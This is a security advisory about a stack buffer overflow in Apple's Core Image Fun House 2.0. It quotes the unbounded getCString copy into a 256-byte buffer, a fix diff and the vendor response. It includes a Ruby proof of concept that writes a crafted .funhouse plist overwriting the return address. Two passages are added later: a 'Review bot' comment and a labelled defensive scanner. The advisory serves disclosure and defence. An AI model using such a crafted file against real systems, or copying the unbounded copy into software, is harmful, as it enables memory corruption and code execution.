[NEWS] Apple Core Image Fun House Buffer Overflow



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com



Apple Core Image Fun House Buffer Overflow
------------------------------------------------------------------------


SUMMARY

"From creating new solutions for print, photography, scientific
visualization, and film post-production to enhancing your application's
user interface with innovative and effortless visual effects,
<http://developer.apple.com/macosx/coreimage.html> Apple's Core Image
performs the heavy lifting that enables the next generation of imaging
applications." It is possible to trigger an exploitable buffer overflow
condition in Apple's Core Image by creating a specially crafted .funhouse
file.

DETAILS

Vulnerable Systems:
* Core Image Fun House version 2.0

Immune Systems:
* Core Image Fun House version 3.1 (Xcode tools)

The Fun House application does not properly parse XML data. Specifically,
it is possible to create a specially crafted .funhouse file that will
trigger an exploitable buffer overflow condition. The code responsible for
the condition is as follows:

// render origin handles using AppKit directly
- (CIImage *)drawPoints:(CIImage *)im
{
    ...
    NSString *str, *str2, *localizedParameter;
    ...

    else if ([type isEqualToString:@"image"])
    {
        // image effect stack element
        // show an image origin (in its center)
        CGRect r = [[es imageAtIndex:i] extent];
        NSPoint offset = [es offsetAtIndex:i];
        pt.x = offset.x + (r.origin.x + r.size.width * 0.5);
        pt.y = offset.y + (r.origin.y + r.size.height * 0.5);
        // the label is the layer's filename (taken from the .funhouse file)
        // with " center" appended; its length is attacker-controlled
        str = [[es filenameAtIndex:i] stringByAppendingString:@" center"];
        [self drawPoint:pt label:str intoContext:cg];
    }
    ...
}

The following code is called by the code referenced above:

/*
    Drawing
*/

// draw an onscreen handle for an image origin, text origin, or filter point
// the handle is a "center symbol" - a circle with crosshairs through it.
// the handle is labelled with the string "str".
// all items are "shadowed"
- (void)drawPoint:(NSPoint)pt label:(NSString *)str intoContext:(CGContextRef)cg
{
    ...
    char cstr[256];   // fixed-size stack buffer
    ...
    if (!movingNow)
    {
        [str getCString:cstr];   // <-- Vulnerability Exists Here: the copy has no length bound
    ...

Fix:
To fix the issue, the call [str getCString:cstr]; needs to be replaced with
[str getCString:cstr maxLength:254]; so that the copy into cstr is bounded.

- [str getCString:cstr];
+ [str getCString:cstr maxLength:254];
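Review bot: the `+ [str getCString:cstr maxLength:254];` line bounds the copy into the 256-byte cstr (254 characters plus the NUL terminator leaves a byte spare), but getCString:maxLength: is a deprecated NSString method that silently truncates a longer label, so drawPoint: still cannot tell a clipped label from an intact one. Prefer `[str getCString:cstr maxLength:sizeof(cstr) encoding:NSUTF8StringEncoding]`, which returns NO when the string does not fit, and act on that return value.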

Vendor response:
This issue is addressed in Xcode tools 3.1. Credit to Kevin Finisterre of
Netragard for reporting this issue to Apple. Further information is
available at: <http://support.apple.com/kb/HT1222>

Proof Of Concept:
#!/usr/bin/ruby
# Copyright (c) Netragard, LLC. adriel@xxxxxxxxxxxxx
#
# /Developer/Applications/Graphics Tools/Core Image Fun House.app
# /Contents/MacOS/Core Image Fun House
#
# (gdb) x/10s 0xbfffddf7
# 0xbfffddf7: 'Z' <repeats 101 times>, "DCBA center"
#
# 2007-07-10 21:15:34.573 Core Image Fun House[1061] CFLog (0):
# CFPropertyListCreateFromXMLData(): plist parse failed;
# the data is notproper UTF-8. The file name for this data
# could be:
#
# /Users/test/Desktop/SuperTastey.funhouse/file.xml
# The parser will retry as in 10.2, but the problem should be
# corrected in the plist.
#
# \x80-\xFF range that do not form proper utf8

len = 300                 # longer than the 256-byte cstr[] in drawPoint:
fname = "SuperTastey"
retaddr = 0x0d0d0d0d      # There are lots of filtered chars!

# start from a clean .funhouse bundle directory
if File.exist?(fname + ".funhouse/file.xml")
  File.unlink(fname + ".funhouse/file.xml")
  Dir.rmdir(fname + ".funhouse")
end
Dir.mkdir(fname + ".funhouse")

# plist with one "image" layer whose file string overflows cstr,
# followed by a filter layer
FUNSTUFF =
  "<?xml version=\"1.0\" encoding=\"UTF-8\"?>" +
  "<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\" " +
  "\"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">" +
  "<plist version=\"1.0\">" +
  "<dict>" +
  "<key>layers</key>" +
  "<array>" +
  "<dict>" +
  "<key>file</key>" +
  "<string>" +
  "Z" * len + [retaddr].pack("V") +
  "</string>" +
  "<key>offsetX</key>" +
  "<real>0.0</real>" +
  "<key>offsetY</key>" +
  "<real>0.0</real>" +
  "<key>type</key>" +
  "<string>image</string>" +
  "</dict>" +
  "<dict>" +
  "<key>classname</key>" +
  "<string>CIGlassDistortion</string>" +
  "<key>type</key>" +
  "<string>filter</string>" +
  "<key>values</key>" +
  "<dict>" +
  "<key>inputCenter_CIVectorValue</key>" +
  "<string>[150 150]</string>" +
  "<key>inputScale</key>" +
  "<real>200</real>" +
  "<key>inputTexture</key>" +
  "<string>" +
  "Z" * 50000 +
  "</string>" +
  "</dict>" +
  "</dict>" +
  "</array>" +
  "</dict>" +
  "</plist>" + "\n"

File.open(fname + ".funhouse/file.xml", "w") { |f|
  f.print(FUNSTUFF)   # weeeeee... lets have fun.
}
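The following Ruby scanner is an added defensive example, not part of the Netragard advisory or of Fun House itself: it parses a file.xml in the layout the proof of concept writes and reports image layers whose file string, once " center" is appended, exceeds the 255 characters plus NUL that cstr[256] in drawPoint: can hold. The fallback sample document is constructed here; the buffer size, suffix and plist key names come from the code quoted above.

```ruby
# Added example, not Fun House or Netragard code: a defensive scanner for .funhouse file.xml.
require 'rexml/document'
CSTR_SIZE        = 256            # char cstr[256] in drawPoint:
LABEL_SUFFIX     = " center"      # appended to the layer filename in drawPoints:
SAFE_LABEL_BYTES = CSTR_SIZE - 1  # one byte must stay free for the NUL terminator

# Turn a plist <dict> element into {key => value element}: plist dicts are
# flat runs of <key>/<value> element pairs, so slice the child elements in twos.
def plist_dict(dict_el)
  h = {}
  dict_el.elements.to_a.each_slice(2) { |k, v| h[k.text] = v if k.name == "key" && v }
  h
end

# The "layers" array of a Fun House file.xml as an array of dict hashes.
def funhouse_layers(xml)
  doc = REXML::Document.new(xml)
  root = doc.elements["/plist/dict"]
  layers = root && plist_dict(root)["layers"]
  return [] unless layers && layers.name == "array"
  layers.elements.to_a("dict").map { |d| plist_dict(d) }
end

# [[layer_index, label_bytes], ...] for image layers whose "file" + " center"
# label would not fit in cstr (the copy drawPoint: makes with getCString:).
def oversized_image_layers(xml)
  funhouse_layers(xml).each_with_index
    .select { |l, _| l["type"] && l["type"].text == "image" }
    .map { |l, i| [i, (l["file"] ? l["file"].text.to_s : "").bytesize + LABEL_SUFFIX.bytesize] }
    .select { |_, bytes| bytes > SAFE_LABEL_BYTES }
end

# Constructed sample in the advisory's layout: one image layer, one filter layer.
def sample_funhouse(file_len)
  <<~XML
    <?xml version="1.0" encoding="UTF-8"?>
    <plist version="1.0"><dict><key>layers</key><array>
    <dict><key>file</key><string>#{"Z" * file_len}</string><key>offsetX</key><real>0.0</real>
    <key>offsetY</key><real>0.0</real><key>type</key><string>image</string></dict>
    <dict><key>classname</key><string>CIGlassDistortion</string><key>type</key><string>filter</string>
    <key>values</key><dict><key>inputScale</key><real>200</real></dict></dict>
    </array></dict></plist>
  XML
end

if __FILE__ == $PROGRAM_NAME   # usage: ruby funhouse_scan.rb [path/to/file.xml]
  xml = ARGV[0] ? File.binread(ARGV[0]) : sample_funhouse(300)
  oversized_image_layers(xml).each { |i, b| puts "layer #{i}: #{b}-byte label, #{SAFE_LABEL_BYTES} max" }
end
```

A file.xml that REXML rejects outright (the advisory's own log shows Fun House's plist parser failing on bytes that are not valid UTF-8 and retrying) raises REXML::ParseException, which a bulk scanner should treat as a finding rather than skip.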


ADDITIONAL INFORMATION

The information has been provided by <mailto:advisories@xxxxxxxxxxxxx>
Netragard Security Advisories.
The original article can be found at:
<http://www.netragard.com/pdfs/research/NETRAGARD-20080630-FUNHOUSE.txt>
